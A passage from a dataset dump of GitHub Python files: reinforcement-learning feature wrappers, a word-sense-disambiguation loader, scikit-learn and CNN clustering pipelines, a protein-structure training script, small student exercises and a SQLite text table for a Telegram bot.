self).__init__(**kwargs)\n self.features_type = features_type\n\n if self.features_type == 'grid':\n self.feat = GridFeatures(**kwargs)\n elif self.features_type == 'tile':\n self.feat = TileCodingFeatures(**kwargs)\n elif self.features_type == 'autoencoder':\n self.feat = AEFeatures(**kwargs)\n elif self.features_type == 'rand':\n self.feat = RandomFeatures(**kwargs)\n else:\n raise ValueError(\"discretizer type can either be grid or vae, but got {} instead.\".format(self.discretize_type))\n\n self.size = self.feat.size\n\n def get_features(self, x):\n return self.feat.get_features(x)\n","repo_name":"uzairakbar/rl-obstacle-avoidance","sub_path":"src/rl_tb_lidar/src/utils/features.py","file_name":"features.py","file_ext":"py","file_size_in_byte":5924,"program_lang":"python","lang":"en","doc_type":"code","stars":58,"dataset":"github-code","pt":"67"} +{"seq_id":"40445625877","text":"import random\n\nk = input(\"Enter a number:\")\nk = int(k)\ntotal = 0\nfor i in range(0, k):\n\ttotal += random.randrange(0, 999) + 1\n\t\nprint(\"The Average was\", end = ' ')\nprint(format(total/k, \"5.2f\"), end = '.')","repo_name":"rayman456/Python","sub_path":"Lab3Ex3.py","file_name":"Lab3Ex3.py","file_ext":"py","file_size_in_byte":205,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"74875859412","text":"from enum import Enum\n\nclass RobotRunnerEvents(Enum):\n BEFORE_EXPERIMENT = 1\n BEFORE_RUN = 2\n START_RUN = 3\n START_MEASUREMENT = 4\n LAUNCH_MISSION = 5\n CONTINUE = 6\n STOP_MEASUREMENT = 7\n STOP_RUN = 8\n POPULATE_RUN_DATA = 9\n AFTER_EXPERIMENT = 10","repo_name":"S2-group/robot-runner","sub_path":"robot-runner/EventManager/Models/RobotRunnerEvents.py","file_name":"RobotRunnerEvents.py","file_ext":"py","file_size_in_byte":276,"program_lang":"python","lang":"en","doc_type":"code","stars":25,"dataset":"github-code","pt":"67"} +{"seq_id":"71666669335","text":"from collections import defaultdict\n\nimport pandas\nfrom nltk.corpus import wordnet as wn\n\nimport wn_utils\n\n\nnaf_pos_to_wn_pos = {\n 'N' : 'n',\n 'V' : 'v',\n 'G' : 'a',\n 'A' : 'r'\n }\n\nclass Token:\n def __init__(self, token_id, text, pos=None, lemma=None):\n self.token_id = token_id\n self.text = text\n self.pos = pos\n self.lemma = lemma\n\n\nclass NAF:\n\n\n def __init__(self,\n doc,\n naf_pos_to_consider={'N', 'V', 'G', 'A'},\n use_pos_in_candidate_selection=True,\n wn_version='30',\n verbose=0,\n ):\n self.naf_pos_to_consider = naf_pos_to_consider\n self.use_pos_in_candidate_selection = use_pos_in_candidate_selection\n self.verbose = verbose\n\n self.doc_name = self.get_doc_name(doc)\n\n self.sentid2token_objs = self.load_sentid2token_objs(doc)\n\n self.df = self.create_df(wn_version)\n\n def __str__(self):\n info = []\n\n attrs = ['doc_name']\n\n for attr in attrs:\n info.append('KEY: %s: %s' % (attr, getattr(self, attr)))\n\n return '\\n'.join(info)\n\n\n def get_doc_name(self, doc):\n return doc.find('nafHeader/fileDesc').get('title')\n\n\n def load_sentid2token_objs(self, doc):\n \"\"\"\n\n :param lxml.etree._ElementTree doc: NAF file loaded with etree.parse()\n\n :rtype: dict\n :return: mapping of sent_id -> list of Token objs\n \"\"\"\n\n sentid2token_objs = defaultdict(list)\n\n wf_els = doc.xpath('text/wf')\n term_els = doc.xpath('terms/term')\n\n # for now, I assume that NAF files should have the same number of wf and term elements\n assert len(wf_els) == len(term_els), 'mismatch in number of wf and term elements'\n\n ignored_pos = set()\n for wf_el, term_el in zip(wf_els, term_els):\n token_id = term_el.get('id')\n text = wf_el.text\n lemma = term_el.get('lemma')\n sent_id = int(wf_el.get('sent'))\n\n naf_pos = term_el.get('pos')\n if naf_pos not in self.naf_pos_to_consider:\n ignored_pos.add(naf_pos)\n\n wn_pos = naf_pos_to_wn_pos.get(naf_pos, None)\n\n if wn_pos is None:\n if self.verbose >= 3:\n print('could not map %s to %s' % (naf_pos, wn_pos))\n\n token_obj = Token(token_id=token_id,\n text=text,\n pos=wn_pos,\n lemma=lemma)\n sentid2token_objs[sent_id].append(token_obj)\n\n\n if self.verbose >= 2:\n print('skipped pos labels: %s' % ignored_pos)\n print('found %s sentences' % {len(sentid2token_objs)})\n\n return sentid2token_objs\n\n\n def create_df(self, wn_version):\n\n\n list_of_lists = []\n headers = ['doc_name', 'pos',\n 'sentence', 'sentence_tokens',\n 'target_lemma', 'token',\n 'token_ids',\n 'candidate_meanings']\n\n for sent_id, token_objs in self.sentid2token_objs.items():\n\n sentence = ' '.join([token_obj.text\n for token_obj in token_objs])\n\n for token_obj in token_objs:\n\n if self.use_pos_in_candidate_selection:\n if not token_obj.pos:\n continue\n\n # TODO: precompute\n if self.use_pos_in_candidate_selection:\n the_pos = token_obj.pos\n else:\n the_pos = None\n synsets = wn_utils.candidate_selection(wn=wn,\n token=token_obj.text,\n target_lemma=token_obj.lemma,\n pos=the_pos)\n synset_identifiers = [wn_utils.synset2identifier(synset, wn_version)\n for synset in synsets]\n\n\n if synset_identifiers:\n one_row = [self.doc_name,\n token_obj.pos,\n sentence,\n token_objs,\n token_obj.lemma,\n token_obj.text,\n [token_obj.token_id],\n synset_identifiers]\n list_of_lists.append(one_row)\n\n\n df = pandas.DataFrame(list_of_lists, columns=headers)\n return df\n\nif __name__ == '__main__':\n import pickle\n from lxml import etree\n from datetime import datetime\n\n import naf_utils\n from utils import time_in_correct_format\n\n start_time = time_in_correct_format(datetime.now())\n\n # load NAF\n doc = etree.parse('example_files/World Chess Championship 1984.naf')\n naf_obj = NAF(doc, verbose=2)\n\n # TODO: process with BERT\n\n end_time = time_in_correct_format(datetime.now())\n\n naf_utils.add_wsd_header(doc,\n start_time=start_time,\n end_time=end_time\n )\n\n with open('example_files/test.df', 'wb') as outfile:\n pickle.dump(naf_obj.df, outfile)\n # TODO: enrich NAF\n\n\n\n\n","repo_name":"cltl/BERT-WSD","sub_path":"wsd_datasets_classes.py","file_name":"wsd_datasets_classes.py","file_ext":"py","file_size_in_byte":5353,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"67"} +{"seq_id":"8757883042","text":"import sqlalchemy\nfrom contextlib import contextmanager\nfrom . import _base, _engines, _sessions\n# The models module need to be import before create_all\nfrom .models import *\n\n\n__all__ = [\n 'session_scope',\n 'init_database',\n 'describe_table'\n]\n\n\n@contextmanager\ndef session_scope(db='default'):\n session = _sessions.get(db)()\n try:\n yield session\n session.commit()\n except:\n session.rollback()\n raise\n finally:\n session.close()\n\n\ndef init_database(db='default', drop_all=False):\n engine = _engines.get(db)\n if drop_all:\n _base.metadata.drop_all(engine)\n _base.metadata.create_all(engine)\n\n\ndef describe_table(table, db='default'):\n engine = _engines.get(db)\n assert engine.has_table(table), \"Table not exists\"\n inspect = sqlalchemy.inspect(engine)\n return {\n 'columns': inspect.get_columns(table),\n 'check_constraints': inspect.get_check_constraints(table),\n 'foreign_keys': inspect.get_foreign_keys(table),\n 'indexes': inspect.get_indexes(table),\n 'pk_constraint': inspect.get_pk_constraint(table),\n 'primary_keys': inspect.get_primary_keys(table),\n 'table_comment': inspect.get_table_comment(table),\n }\n","repo_name":"travishen/sqlalchemy-oracle-template","sub_path":"src/app/database/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":1242,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"36266689221","text":"import pandas as pd\nimport numpy as np\nimport matplotlib.pyplot as plt\nfrom imblearn.over_sampling import RandomOverSampler\n\ndef classifier_pipeline(data: pd.DataFrame, target_var: str, classifier, cv_grid: dict, oversampler=RandomOverSampler()):\n \"\"\"\n creates a random foreset pipeline for classification\n\n Params: \n data: pandas data frame used for classification\n target_var: variables name for target var\n classifier: provided classifier for pipeline\n cv_grid: parameter grid for cross validation\n\n Returns: \n best_mod: best model chosen from cross validation\n X_test: feature data used for testing\n y_test: target data used for testing\n y_train: feature data for testing\n \"\"\"\n \n from sklearn.model_selection import train_test_split, RandomizedSearchCV\n from sklearn.preprocessing import MinMaxScaler, OneHotEncoder\n from imblearn.pipeline import Pipeline\n from sklearn.experimental import enable_iterative_imputer\n from sklearn.impute import IterativeImputer, SimpleImputer\n from sklearn.compose import ColumnTransformer\n \n data = data.copy()\n data.dropna(subset=(target_var), inplace=True)\n X = data.drop(target_var, axis=\"columns\")\n y = data[target_var]\n \n X_train, X_test, y_train, y_test = train_test_split(X, y,\n train_size=.8, \n random_state=117)\n \n num_cols = list(data.select_dtypes(include=\"float64\").columns)\n cat_cols = list(data.select_dtypes(include=\"object\").columns)\n cat_cols.remove(target_var)\n \n num_pipe = Pipeline(steps=[(\"it_impu\", IterativeImputer()), \n (\"min_max\", MinMaxScaler())])\n cat_pipe = Pipeline(steps=[(\"cat_impu\", SimpleImputer(strategy=\"most_frequent\")),\n ('encoder', OneHotEncoder(handle_unknown=\"ignore\"))])\n \n col_t = ColumnTransformer([(\"num_transfrom\", num_pipe, num_cols), \n ('cat_transform', cat_pipe, cat_cols)])\n \n \n class_pipe = Pipeline(steps=[(\"col_trans\", col_t),\n (\"samp\", oversampler),\n (\"class\", classifier)])\n \n grid_clf = RandomizedSearchCV(estimator=class_pipe, \n param_distributions=cv_grid,\n scoring=\"accuracy\", cv=10, \n verbose=False)\n grid_clf.fit(X_train, y_train)\n best_mod = grid_clf.best_estimator_\n best_mod.fit(X_train, y_train)\n return best_mod, X_test, y_test, y_train\n\n\n","repo_name":"Christheoneoneil/csys395_final","sub_path":"classifier_pipe.py","file_name":"classifier_pipe.py","file_ext":"py","file_size_in_byte":2635,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"26666523212","text":"'''Script for image clustering using CNNs.\n\nUsage:\n python image_clustering.py .yaml\n\nAuthor:\n Cedric Basuel\n\n'''\n\nimport tensorflow as tf\nimport numpy as np\nimport cv2\nimport sys\nimport os\nimport yaml\nimport time\nimport logging\nfrom functools import wraps\nfrom sklearn.cluster import KMeans\nimport pandas as pd\n\n\nlogging.basicConfig(\n # filename='train_image.log',\n format='[IMAGE_CLUSTERING] %(asctime)s %(message)s', datefmt='%m/%d/%Y %I:%M:%S %p', \n level=logging.DEBUG\n )\n\ndef timer(func):\n @wraps(func)\n def wrapper_time(*args, **kwargs):\n start_time = time.time()\n value = func(*args, **kwargs)\n run_time = time.time() - start_time\n logging.info('{} took {} seconds to finish.'.format(func.__name__, run_time))\n return value\n return wrapper_time\n\n@timer\ndef load_images(dir, target_size, labelmap):\n '''Load train/test images from a directory.\n\n Params\n ------\n dir : str\n Where images will be loaded from.\n\n Returns\n -------\n image_list : ndarray\n List of raw images.\n \n label_list : ndarray\n Label list for each image, mapped to integer labels.\n\n '''\n \n image_list = []\n label_list = []\n logging.info('Loading images from {}...'.format(dir))\n for root, dirs, files in os.walk(dir):\n for file in files:\n temp_dir = str.split(root, '/') \n try:\n temp_image = cv2.imread(os.path.join(root, file))\n temp_image = cv2.cvtColor(temp_image, cv2.COLOR_BGR2RGB)\n temp_image = cv2.resize(temp_image, dsize=target_size)\n image_list.append(temp_image)\n label_list.append(file) \n except cv2.error:\n pass\n\n image_list = np.array(image_list)\n return image_list, label_list\n\n@timer\ndef get_embedding(image_list, model_name, image_shape, model_loaded=True):\n '''Use a pretrained CNN model to get features from an image.\n\n Params\n ------\n image_list : ndarray\n List of raw images from load_images.\n\n model_name : str\n Name of CNN model.\n\n image_shape : tuple\n Dimensions of image.\n\n model_loaded : bool\n True if model is preloaded in env, otherwise load CNN model from scratch.\n\n Returns\n -------\n emb_list : ndarray\n Extracted image features.\n\n '''\n logging.info('Getting image embeddings...')\n logging.info(model_name)\n\n emb_list = []\n model = model_name\n\n if not model_loaded:\n if model_name=='mobilenet':\n model = tf.keras.applications.MobileNetV2(\n weights='imagenet',\n include_top=True, ### wait True nga dapat db?? nalito ako\n input_shape=image_shape,\n layers=tf.keras.layers\n ) \n elif model_name=='resnet50':\n model = tf.keras.applications.ResNet50(\n weights='imagenet', \n include_top=True, \n input_shape=image_shape\n )\n else: \n raise ValueError('Model not yet available.')\n\n logging.info('Successfully loaded model.')\n\n\n for img in image_list:\n img = np.expand_dims(img, axis=0)\n temp_emb = model.predict(img)\n emb_list.append(np.squeeze(temp_emb))\n \n logging.info('Successfully extracted embeddings.')\n \n return image_list, np.array(emb_list)\n\n@timer\ndef cluster_images(image_list, emb_list, num_clusters):\n '''Use kmeans clustering to obtain clusters of images\n given n-dimensional embeddings from get_embedding().\n\n Params\n ------\n emb_list : ndarray\n Embeddings extracted from each image.\n\n num_clusters: int\n Number of clusters to fit.\n\n Returns\n -------\n clustered_images : list\n List of integers indicating cluster membership for each image.\n\n '''\n kmodel = KMeans(n_clusters=num_clusters, n_jobs=-1)\n\n logging.info(num_clusters)\n logging.info(emb_list.shape)\n\n kmodel.fit(emb_list)\n logging.info('KMeans clustering done.')\n\n clustered_images = kmodel.predict(emb_list)\n\n return clustered_images\n\n\n\n\nif __name__=='__main__':\n\n logging.info('Loading configs...')\n CONFIG_FILE = sys.argv[1]\n\n with open(CONFIG_FILE) as cfg:\n config = yaml.safe_load(cfg)\n\n logging.info('Configuring GPU...')\n gpus = tf.config.experimental.list_physical_devices('GPU')\n if gpus:\n try:\n tf.config.experimental.set_virtual_device_configuration(\n gpus[0],\n [tf.config.experimental.VirtualDeviceConfiguration(memory_limit=config['training'['gpu_mem']])])\n logical_gpus = tf.config.experimental.list_logical_devices('GPU')\n print(len(gpus), \"Physical GPUs,\", len(logical_gpus), \"Logical GPUs\")\n except RuntimeError as e:\n pass\n\n image_list, label_list = load_images(dir=config['training']['dir'],\n target_size=(config['training']['image_shape'], config['training']['image_shape']),\n labelmap=config['training']['labels']\n )\n\n image_list, emb_list = get_embedding(image_list=image_list,\n model_name=config['training']['model_name'],\n image_shape=(config['training']['image_shape'], config['training']['image_shape'], 3),\n model_loaded=False\n )\n\n logging.info(emb_list.shape)\n\n clustered_images = cluster_images(image_list=image_list, \n emb_list=emb_list, \n num_clusters=config['training']['num_clusters']\n )\n \n logging.info('Done! ')\n df = pd.DataFrame({'Image' : label_list, 'Cluster' : clustered_images})\n\n print(df)","repo_name":"cedricbasuel/image-clustering","sub_path":"image_clustering.py","file_name":"image_clustering.py","file_ext":"py","file_size_in_byte":5657,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"67"} +{"seq_id":"22069111395","text":"import numpy as np\nimport scipy.stats as stats\nfrom ..distribution import Distribution\n\nclass GaussianParameterProcess(Distribution):\n\n def __init__(self, mu0, sigma0, sigmat, sigma, eta=0.9):\n self.parameters = {}\n self.mu0, self.sigma0 = mu0, sigma0\n self.sigmat = sigmat\n self.sigma = sigma\n\n self.sigma0inv = np.linalg.inv(self.sigma0)\n self.sigmatinv = np.linalg.inv(self.sigmat)\n self.sigmainv = np.linalg.inv(self.sigma)\n self.eta = eta\n\n self.sigma0inv_mu0 = np.dot(self.sigma0inv, self.mu0)\n\n def generate(self, parameter=None):\n if parameter is None:\n parameter = self.mu0\n return stats.multivariate_normal(mean=self.eta * parameter, cov=self.sigma0).rvs()\n\n def prior_log_likelihood(self, x):\n return stats.multivariate_normal(mean=self.mu0, cov=self.sigma0).logpdf(x)\n\n def transition_log_likelihood(self, mu1, mu2):\n return stats.multivariate_normal(mean=self.eta * mu1, cov=self.sigmat).logpdf(mu2)\n\n def data_log_likelihood(self, x, mu):\n return stats.multivariate_normal(mean=mu, cov=self.sigma).logpdf(x)\n\n def sample_one(self, parameter):\n return stats.multivariate_normal(mean=parameter, cov=self.sigma).rvs()\n\n def sample_posterior(self, data, children, parent):\n Nd, _ = data.shape\n if len(children.shape) == 1:\n Nc = 0\n else:\n Nc, _ = children.shape\n\n sigma0inv = self.sigma0inv\n sigma0inv_mu0 = self.sigma0inv_mu0\n if parent is not None:\n sigma0inv = self.sigmatinv\n sigma0inv_mu0 = np.dot(self.sigmatinv, self.eta * parent)\n\n sigman = np.linalg.inv(sigma0inv + Nd * self.sigmainv + Nc * self.sigmatinv)\n children_mean = 0\n if Nc > 0:\n children_mean = np.dot(self.sigmatinv, children.sum(axis=0))\n mun = np.dot(sigman, sigma0inv_mu0 +\n np.dot(self.sigmainv, data.sum(axis=0)) +\n children_mean)\n return stats.multivariate_normal(mean=mun, cov=sigman).rvs()\n","repo_name":"sharadmv/trees","sub_path":"trees/tssb/parameter.py","file_name":"parameter.py","file_ext":"py","file_size_in_byte":2088,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"67"} +{"seq_id":"14227110477","text":"def torusdbn_Q_accuracy(batch):\n y = batch[\"model_output\"]\n y_argmax = np.argmax(y, 1)\n predictions = batch[\"torusdbn\"]\n identical = (predictions == y_argmax)\n return np.mean(identical), identical\n\ndef pssm_Q_accuracy(batch):\n y = batch[\"model_output\"]\n y_argmax = np.argmax(y, 1)\n predictions = batch[\"pssm\"]\n identical = (np.argmax(predictions, 1) == y_argmax)\n return np.mean(identical), identical\n\ntorus_skip_list = [\"5COY_\", \"4Y9I_\", \"4YSL_\", \"5HZ7_\", \"5KVC_\", \"5A9P_\"]\n\nif __name__ == '__main__':\n import glob\n import os\n import numpy as np\n from Deepfold.Models import models\n from Deepfold.batch_factory import BatchFactory\n from utils import str2bool\n\n import argparse\n\n parser = argparse.ArgumentParser()\n parser.add_argument(\"--high-res-input-dir\", dest=\"high_res_features_input_dir\",\n help=\"Location of input files containing high-res features\")\n parser.add_argument(\"--test-set-fraction\",\n help=\"Fraction of data set aside for testing (default: %(default)s)\", type=float, default=0.25)\n parser.add_argument(\"--validation-set-size\",\n help=\"Size of validation set (taken out of training set) (default: %(default)s)\", type=int, default=10)\n parser.add_argument(\"--optimize-using-lbfgs\", action=\"store_true\",\n help=\"Whether to use the LBFGS optimizer\")\n parser.add_argument(\"--num-passes\",\n help=\"Number of passes over the data during traning (default: %(default)s)\", type=int, default=10)\n parser.add_argument(\"--max-batch-size\",\n help=\"Maximum batch size used during training (default: %(default)s)\", type=int, default=1000)\n parser.add_argument(\"--subbatch-max-size\",\n help=\"Maximum batch size used for gradient calculation (default: %(default)s)\", type=int, default=25)\n parser.add_argument(\"--model-checkpoint-path\",\n help=\"Where to dump/read model checkpoints (default: %(default)s)\", default=\"models\")\n parser.add_argument(\"--max-to-keep\",\n help=\"Maximal number of checkpoints to keep (default: %(default)s)\", type=int, default=2)\n parser.add_argument(\"--read-from-checkpoint\", action=\"store_true\",\n help=\"Whether to read model from checkpoint\")\n parser.add_argument(\"--mode\", choices=['train', 'test'], default=\"train\", \n help=\"Mode of operation (default: %(default)s)\")\n parser.add_argument(\"--model-output-type\", choices=['aa', 'ss'], default=\"ss\", \n help=\"Whether the model should output secondary structure or amino acid labels (default: %(default)s)\")\n parser.add_argument(\"--dropout-keep-prob\", type=float, default=0.5, \n help=\"Probability for leaving out node in dropout (default: %(default)s)\")\n parser.add_argument(\"--learning-rate\",\n help=\"Learing rate for Adam (default: %(default)s)\", type=float, default=0.001)\n parser.add_argument(\"--reg-fact\",\n help=\"Regularisation factor (default: %(default)s)\", type=float, default=0.001)\n parser.add_argument(\"--output-interval\",\n help=\"The output interval for train and validation error (default: %(default)s)\", type=int, default=None)\n parser.add_argument(\"--model\", choices=list(models.keys()), default=\"CubedSphereModel01\",\n help=\"Which model definition to use (default: %(default)s)\")\n parser.add_argument(\"--torusdbn-prediction-input-dir\", dest=\"torusdbn_prediction_input_dir\",\n help=\"Add torusdbn aa and ss predictions to the batch factory. In test mode, comparisons to torusdbn will be printed\")\n parser.add_argument(\"--pssm-input-dir\", dest=\"pssm_input_dir\",\n help=\"Add evolutionary AA pssm information. In test mode, comparisons to this pssm will be printed\")\n parser.add_argument(\"--step\", type=int, default=None,\n help=\"Which checkpoint file to use (default: %(default)s)\")\n parser.add_argument(\"--duplicate-origin\",\n type=str2bool, nargs='?', const=True, default=\"True\",\n help=\"Whether to duplicate the atoms in all bins at the origin for the spherical model\")\n \n options = parser.parse_args()\n\n print(\"# Options\")\n for key, value in sorted(vars(options).items()):\n print(key, \"=\", value)\n\n high_res_protein_feature_filenames = sorted(glob.glob(os.path.join(options.high_res_features_input_dir, \"*protein_features.npz\")))\n high_res_grid_feature_filenames = sorted(glob.glob(os.path.join(options.high_res_features_input_dir, \"*residue_features.npz\")))\n\n train_start = 0\n validation_end = test_start = int(len(high_res_protein_feature_filenames)*(1.-options.test_set_fraction))\n train_end = validation_start = int(validation_end-options.validation_set_size)\n test_end = len(high_res_protein_feature_filenames)\n\n print(\"# Data:\")\n print(\"Total size: \", len(high_res_protein_feature_filenames))\n print(\"Training size: \", train_end - train_start)\n print(\"Validation size: \", validation_end - validation_start)\n print(\"Test size: \", test_end - test_start)\n \n if options.mode == 'train':\n batch_factory = BatchFactory()\n batch_factory.add_data_set(\"high_res\",\n high_res_protein_feature_filenames[:train_end],\n high_res_grid_feature_filenames[:train_end],\n duplicate_origin=options.duplicate_origin)\n batch_factory.add_data_set(\"model_output\",\n high_res_protein_feature_filenames[:train_end],\n key_filter=[options.model_output_type+\"_one_hot\"])\n\n validation_batch_factory = BatchFactory()\n validation_batch_factory.add_data_set(\"high_res\",\n high_res_protein_feature_filenames[validation_start:validation_end],\n high_res_grid_feature_filenames[validation_start:validation_end],\n duplicate_origin=options.duplicate_origin)\n validation_batch_factory.add_data_set(\"model_output\",\n high_res_protein_feature_filenames[validation_start:validation_end],\n key_filter=[options.model_output_type+\"_one_hot\"])\n elif options.mode == 'test':\n batch_factory = BatchFactory()\n batch_factory.add_data_set(\"high_res\",\n high_res_protein_feature_filenames[test_start:],\n high_res_grid_feature_filenames[test_start:],\n duplicate_origin=options.duplicate_origin)\n batch_factory.add_data_set(\"model_output\",\n high_res_protein_feature_filenames[test_start:],\n key_filter=[options.model_output_type+\"_one_hot\"])\n\n if options.torusdbn_prediction_input_dir:\n torusdbn_feature_filenames = []\n for filename in high_res_protein_feature_filenames:\n basename = os.path.basename(filename)\n if not basename[:5] in torus_skip_list:\n torusdbn_feature_filenames.append(os.path.join(options.torusdbn_prediction_input_dir, basename))\n batch_factory.add_data_set(\"torusdbn\",\n torusdbn_feature_filenames[test_start:test_end],\n key_filter=[options.model_output_type])\n if options.pssm_input_dir:\n pssm_feature_filenames = []\n for filename in high_res_protein_feature_filenames:\n basename = os.path.basename(filename)\n pssm_feature_filenames.append(os.path.join(options.pssm_input_dir, basename))\n batch_factory.add_data_set(\"pssm\",\n pssm_feature_filenames[test_start:test_end],\n key_filter=[\"pssm\"])\n\n high_res_grid_size = batch_factory.next(1, increment_counter=False)[0][\"high_res\"].shape\n output_size = batch_factory.next(1, increment_counter=False)[0][\"model_output\"].shape[1]\n\n if options.model.startswith(\"Spherical\"):\n model = models[options.model](r_size_high_res = high_res_grid_size[1],\n theta_size_high_res = high_res_grid_size[2],\n phi_size_high_res = high_res_grid_size[3],\n channels_high_res = high_res_grid_size[4],\n output_size = output_size,\n optimize_using_lbfgs = options.optimize_using_lbfgs,\n reg_fact = options.reg_fact,\n learning_rate = options.learning_rate,\n model_checkpoint_path = options.model_checkpoint_path,\n max_to_keep = options.max_to_keep)\n elif options.model.startswith(\"CubedSphere\"):\n model = models[options.model](patches_size_high_res = high_res_grid_size[1],\n r_size_high_res = high_res_grid_size[2],\n xi_size_high_res = high_res_grid_size[3],\n eta_size_high_res = high_res_grid_size[4],\n channels_high_res = high_res_grid_size[5],\n output_size = output_size,\n optimize_using_lbfgs = options.optimize_using_lbfgs,\n reg_fact = options.reg_fact,\n learning_rate = options.learning_rate,\n model_checkpoint_path = options.model_checkpoint_path,\n max_to_keep = options.max_to_keep)\n elif options.model.startswith(\"Cartesian\"):\n model = models[options.model](x_size_high_res = high_res_grid_size[1],\n y_size_high_res = high_res_grid_size[2],\n z_size_high_res = high_res_grid_size[3],\n channels_high_res = high_res_grid_size[4],\n output_size = output_size,\n optimize_using_lbfgs = options.optimize_using_lbfgs,\n reg_fact = options.reg_fact,\n learning_rate = options.learning_rate,\n model_checkpoint_path = options.model_checkpoint_path,\n max_to_keep = options.max_to_keep)\n else:\n raise argparse.ArgumentTypeError(\"Model type not suppported: %s\" % options.model)\n \n\n if options.read_from_checkpoint:\n model.restore(options.model_checkpoint_path, step=options.step)\n \n \n if options.mode == 'train':\n model.train(train_batch_factory = batch_factory,\n validation_batch_factory = validation_batch_factory,\n num_passes = options.num_passes,\n max_batch_size = options.max_batch_size,\n subbatch_max_size = options.subbatch_max_size,\n dropout_keep_prob = options.dropout_keep_prob,\n output_interval = options.output_interval)\n\n elif options.mode == 'test':\n\n additional_labels = []\n if options.torusdbn_prediction_input_dir:\n additional_labels.append(\"TORUSDBN\")\n if options.pssm_input_dir:\n additional_labels.append(\"PSSM\")\n print(\"# Q%s loss PDB %s\" % (output_size, \" \".join(additional_labels)))\n\n prev_pdb_id = None\n pdb_ids = set()\n all_identical = np.array([])\n all_entropies = np.array([])\n\n torusdbn_all_identical = np.array([])\n pssm_all_identical = np.array([])\n\n more_data = True\n\n while more_data:\n\n batch, subbatch_sizes = batch_factory.next(options.max_batch_size,\n subbatch_max_size=options.subbatch_max_size,\n enforce_protein_boundaries=True,\n include_pdb_ids=True,\n return_single_proteins=True)\n more_data = (batch_factory.feature_index != 0)\n loss, identical, entropies, regularization = model.Q_accuracy_and_loss(batch, subbatch_sizes, return_raw=True)\n\n # Note that the return_single_proteins make sure that the batch always returns a whole protein\n assert(batch[\"pdb\"][1:] == batch[\"pdb\"][:-1])\n assert(batch[\"pdb\"][0] != prev_pdb_id)\n prev_pdb_id = batch[\"pdb\"][0]\n\n # Update the overall stats\n pdb_ids = pdb_ids.union(set(batch[\"pdb\"]))\n all_identical = np.concatenate((all_identical, identical))\n all_entropies = np.concatenate((all_entropies, entropies))\n\n # Calculate the accuracy for TorusDBN\n if options.torusdbn_prediction_input_dir:\n if batch[\"pdb\"][0] not in torus_skip_list:\n torusdbn_Q_test, torusdbn_identical = torusdbn_Q_accuracy(batch)\n torusdbn_all_identical = np.concatenate((torusdbn_all_identical, torusdbn_identical))\n else:\n torusdbn_Q_test = None\n\n\n # Calculate the accuracy for the PSSM model\n if options.pssm_input_dir:\n pssm_Q_test, pssm_idencical = pssm_Q_accuracy(batch)\n pssm_all_identical = np.concatenate((pssm_all_identical, pssm_idencical))\n\n # Print the accuracies for this PDB\n additional_values = []\n if options.torusdbn_prediction_input_dir:\n additional_values.append(torusdbn_Q_test)\n if options.pssm_input_dir:\n additional_values.append(pssm_Q_test)\n\n Q_test = np.mean(identical)\n loss_test = loss\n\n print(Q_test, loss_test, \",\".join([pdb_id for pdb_id in set(batch[\"pdb\"])]), \"%s\" % \" \".join(map(str, additional_values)))\n\n # Print the overall scores\n Q_test = np.mean(all_identical)\n loss_test = np.mean(all_entropies) + regularization\n\n print(\"# Statistics for the whole dataset:\")\n print(\"# Q%s score (test set): %f\" % (output_size, Q_test))\n print(\"# loss (test set): %f\" % (loss_test))\n\n if options.torusdbn_prediction_input_dir:\n print(\"# TORUSDBN COMPARISON: Q%s score (test set): %s\" % (output_size, np.mean(torusdbn_all_identical)))\n if options.pssm_input_dir:\n print(\"# PSSM COMPARISON: Q%s score (test set): %s\" % (output_size, np.mean(pssm_all_identical)))\n\n print(\"# PDB IDs: \", [pdb_id for pdb_id in pdb_ids])\n","repo_name":"rcoor/cubed-sphere","sub_path":"python3-deepfold/deepfold_train.py","file_name":"deepfold_train.py","file_ext":"py","file_size_in_byte":15533,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"10713728382","text":"def yes_no(question):\n\n error = \"Please answer will either yes/no\"\n\n valid = False\n while not valid:\n\n\n response = input(question).lower()\n\n if response == \"yes\" or response == \"y\":\n valid = True\n return \"yes\"\n\n elif response == \"no\" or response == \"n\":\n valid = True\n return \"no\"\n\n else:\n print(error)\n\nfor item in range(0,6):\n want_snacks = yes_no(\"Does thou want any of thy snacks?\")\n","repo_name":"FrancesMangos/22_movie_fundraiser","sub_path":"venv/05_yes_no_checker_v1.py","file_name":"05_yes_no_checker_v1.py","file_ext":"py","file_size_in_byte":482,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"36658165059","text":"import sqlite3\n\nfrom databases.auth_data import path\nfrom log.create_logger import logger\n\n\nclass SentencesDB:\n \"\"\"\n Сущность, которая содержит в себе предложения команд RUS/EN.\n Иначе говоря таблица, которая содержит текст всего бота: кнопок/команд/предложений на двух языках\n \"\"\"\n # Атрибуты сущности:\n # 1. type_sentence - Тип кнопки или же тип предложения.\n # Например: \"Кнопка 1\", \"Кнопка 2\", \"Предложение 1\" и так далее.\n # 2. sentence - Сам текст, который будет содержаться в том или ином предложении/команде/кнопки.\n # 3. language - Язык текущего предложения. Так как в текущем приложении языка будет два и расширение не планируется,\n # то True - это RUS, а False - это EN\n # 4. photo_id - ID (телеграм) фото, которое устанавливает админ.\n # В текущей сущности атрибуты type_sentence and language будут выступать как составной ключ при помощи,\n # которого можно вытянуть любое sentence, но они будут повторяться, поэтому чтобы дотянуть их до NF2 был создан\n # обычный pk ;)\n def __init__(self):\n try:\n self.__base = sqlite3.connect(path)\n self.__cur = self.__base.cursor()\n # self.__cur.execute('''CREATE TABLE IF NOT EXISTS sentences(\n # pk INTEGER PRIMARY KEY AUTOINCREMENT,\n # type_sentence VARCHAR(255),\n # sentence TEXT,\n # language BOOLEAN,\n # # photo_id TEXT\n # )''')\n # self.__base.commit()\n except Exception as ex:\n logger.warning(f'Errors occurred while connecting to the sentences entity\\n'\n f'{ex}')\n\n def exists_sentence(self, type_sentence: str, language: bool) 